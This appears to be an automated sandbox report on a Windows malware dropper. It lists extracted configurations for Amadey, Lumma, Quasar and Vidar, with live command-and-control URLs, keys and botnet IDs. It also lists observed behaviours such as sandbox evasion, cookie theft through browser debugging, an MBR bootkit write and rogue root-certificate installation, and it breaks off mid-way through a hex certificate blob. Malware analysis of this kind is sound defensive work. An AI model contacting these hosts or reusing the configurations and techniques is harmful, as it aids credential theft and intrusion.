amadey | hxxp://176[.]113[.]115[.]7/mine/random[.]exe

Resubmissions

08/04/2025, 18:51

250408-xhjj9ayms7 10

06/04/2025, 21:54

250406-1sfswssk12 10

Analysis

max time kernel
76s
max time network
636s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
06/04/2025, 21:54

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

http://176.113.115.7/mine/random.exe

Score

10^/10

amadey lumma quasar vidar 092155 f942dabea5a58a141236ae72e4720fbf office04 bootkit credential_access defense_evasion discovery execution exploit persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://reboundui.live/aomgd

https://jrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://xrfxcaseq.live/gspaz

https://ywmedici.top/noagis

https://npepperiop.digital/oage

https://cplantainklj.run/opafg

https://gpuerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://rambutanvcx.run/adioz

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Extracted

Family

vidar

Version

13.4

Botnet

f942dabea5a58a141236ae72e4720fbf

https://t.me/f07nd

https://steamcommunity.com/profiles/76561199843252735

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 5 IoCs

stealer

resource	yara_rule
behavioral1/memory/6124-1377-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/6124-1378-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/6124-1424-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/6124-1436-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/6124-1442-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/956-1362-0x000000000CBF0000-0x000000000CD44000-memory.dmp	family_quasar
behavioral1/memory/956-1363-0x000000000CD70000-0x000000000CD8A000-memory.dmp	family_quasar

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Contacts a large (48315) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bae6544296.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1ba54af266.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	but2.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
956	powershell.exe
6260	powershell.exe
10148	powershell.exe
7836	powershell.exe
6036	powershell.exe
27912	powershell.exe
9496	powershell.exe
3968	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 11 IoCs

flow	pid	Process
62	2552	rapes.exe
62	2552	rapes.exe
49	3576	msedge.exe
7664	2552	rapes.exe
7664	2552	rapes.exe
76	2552	rapes.exe
6256	2552	rapes.exe
698	2552	rapes.exe
698	2552	rapes.exe
698	2552	rapes.exe
698	2552	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
8196	takeown.exe
20244	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 30 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
31968	chrome.exe
12276	msedge.exe
26740	chrome.exe
19948	msedge.exe
30960	chrome.exe
6520	msedge.exe
32728	msedge.exe
5196	chrome.exe
6148	msedge.exe
25212	chrome.exe
25128	chrome.exe
32504	msedge.exe
19896	chrome.exe
26248	chrome.exe
13840	msedge.exe
26240	msedge.exe
25028	chrome.exe
25896	chrome.exe
8024	chrome.exe
3216	chrome.exe
5552	chrome.exe
5544	chrome.exe
5612	msedge.exe
25148	chrome.exe
12548	chrome.exe
25164	msedge.exe
25056	chrome.exe
4088	chrome.exe
5692	chrome.exe
8032	chrome.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bae6544296.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1ba54af266.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1ba54af266.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bae6544296.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	but2.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_48c4f339.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_48c4f339.cmd	powershell.exe

Executes dropped EXE 16 IoCs

pid	Process
128	random.exe
2552	rapes.exe
4832	rapes.exe
1224	bae6544296.exe
488	1ba54af266.exe
1676	9sWdA2p.exe
4084	but2.exe
3392	pcidrv.exe
4560	larBxd7.exe
5764	Jordan.com
5456	qhjMWht.exe
5144	LJl8AAr.exe
6056	n0hEgR9.exe
4060	amnew.exe
5264	futors.exe
6032	AfkeY2q.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	1ba54af266.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	but2.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	bae6544296.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
8196	takeown.exe
20244	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	71.167.85.149

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
8187	raw.githubusercontent.com
8207	raw.githubusercontent.com
53166	raw.githubusercontent.com

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11190	api.ipify.org
15498	ip-api.com
23930	ip-api.com
34970	ip-api.com
79	ip-api.com
5361	ip-api.com
11170	api.ipify.org
11174	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	bae6544296.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x001b00000002b381-16870.dat	autoit_exe
behavioral1/files/0x000300000002a9ca-20953.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 7 IoCs

discovery

Process Discovery

T1057

pid	Process
6056	tasklist.exe
5180	tasklist.exe
31504	tasklist.exe
27284	tasklist.exe
23436	tasklist.exe
14312	tasklist.exe
30256	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
128	random.exe
2552	rapes.exe
4832	rapes.exe
1224	bae6544296.exe
488	1ba54af266.exe
4084	but2.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5144 set thread context of 5776	5144	LJl8AAr.exe	154
PID 6056 set thread context of 6060	6056	n0hEgR9.exe	168

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File created	C:\Windows\Tasks\rapes.job	random.exe
File opened for modification	C:\Windows\GovernmentalOttawa	larBxd7.exe
File opened for modification	C:\Windows\AmongDouble	larBxd7.exe
File opened for modification	C:\Windows\GentleOklahoma	larBxd7.exe
File opened for modification	C:\Windows\ModularVol	larBxd7.exe
File opened for modification	C:\Windows\LowerOrgasm	larBxd7.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 36 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
11508	sc.exe
15284	sc.exe
27888	sc.exe
26076	sc.exe
16528	sc.exe
10680	sc.exe
28812	sc.exe
9160	sc.exe
5468	sc.exe
17228	sc.exe
15344	sc.exe
22132	sc.exe
26652	sc.exe
15128	sc.exe
12456	sc.exe
2960	sc.exe
10200	sc.exe
7028	sc.exe
24112	sc.exe
13936	sc.exe
17548	sc.exe
12248	sc.exe
26344	sc.exe
31164	sc.exe
6088	sc.exe
21412	sc.exe
20180	sc.exe
7152	sc.exe
6300	sc.exe
16316	sc.exe
9336	sc.exe
14912	sc.exe
10976	sc.exe
6984	sc.exe
30416	sc.exe
25468	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 23 IoCs

pid	pid_target	Process	procid_target
31532	6516	WerFault.exe	234
31596	7680	WerFault.exe	238
31684	12448	WerFault.exe	253
31724	18664	WerFault.exe	257
19980	8612	WerFault.exe	323
26632	3808	WerFault.exe	322
23196	7852	WerFault.exe	413
23232	11740	WerFault.exe	397
20476	15080	WerFault.exe	493
22644	20452	WerFault.exe	497
29524	15176	WerFault.exe	594
3976	30484	WerFault.exe	603
13780	29680	WerFault.exe	599
4024	5688	WerFault.exe	703
31460	26560	WerFault.exe	715
23868	15744	WerFault.exe	749
28192	15508	WerFault.exe	757
24780	24704	WerFault.exe	762
32428	10372	WerFault.exe	773
7420	28620	WerFault.exe	776
15596	5816	WerFault.exe	793
10540	25788	WerFault.exe	794
16120	31132	WerFault.exe	805

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bae6544296.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	but2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jordan.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AfkeY2q.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1ba54af266.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pcidrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 27 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
23736	PING.EXE
13332	PING.EXE
10164	PING.EXE
27292	PING.EXE
14584	PING.EXE
26332	PING.EXE
13836	PING.EXE
14492	PING.EXE
28616	PING.EXE
15756	PING.EXE
30100	PING.EXE
27420	PING.EXE
30552	PING.EXE
31248	PING.EXE
30576	PING.EXE
31596	PING.EXE
14480	PING.EXE
5452	PING.EXE
3388	PING.EXE
7792	PING.EXE
20724	PING.EXE
3908	PING.EXE
17360	PING.EXE
25648	PING.EXE
6244	PING.EXE
20996	PING.EXE
10188	PING.EXE

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Taskmgr.exe

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
2856	timeout.exe
6700	timeout.exe
8984	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	23966	Go-http-client/1.1
HTTP User-Agent header	49639	Go-http-client/1.1

Kills process with taskkill 29 IoCs

defense_evasion

pid	Process
25000	taskkill.exe
11980	taskkill.exe
27200	taskkill.exe
14752	taskkill.exe
17004	taskkill.exe
11484	taskkill.exe
23292	taskkill.exe
16220	taskkill.exe
5504	taskkill.exe
24272	taskkill.exe
25464	taskkill.exe
8416	taskkill.exe
15456	taskkill.exe
15196	taskkill.exe
27140	taskkill.exe
5776	taskkill.exe
804	taskkill.exe
16860	taskkill.exe
13664	taskkill.exe
16744	taskkill.exe
20472	taskkill.exe
7920	taskkill.exe
23440	taskkill.exe
13900	taskkill.exe
32000	taskkill.exe
32404	taskkill.exe
8732	taskkill.exe
24028	taskkill.exe
8724	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133884500869179384"	msedge.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask	Taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1136229799-3442283115-138161576-1000\{ACA37CFD-7E7F-404A-AB8D-EA35AD5F79AB}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings	Taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Modifies system certificate store 2 TTPs 5 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	pcidrv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	pcidrv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c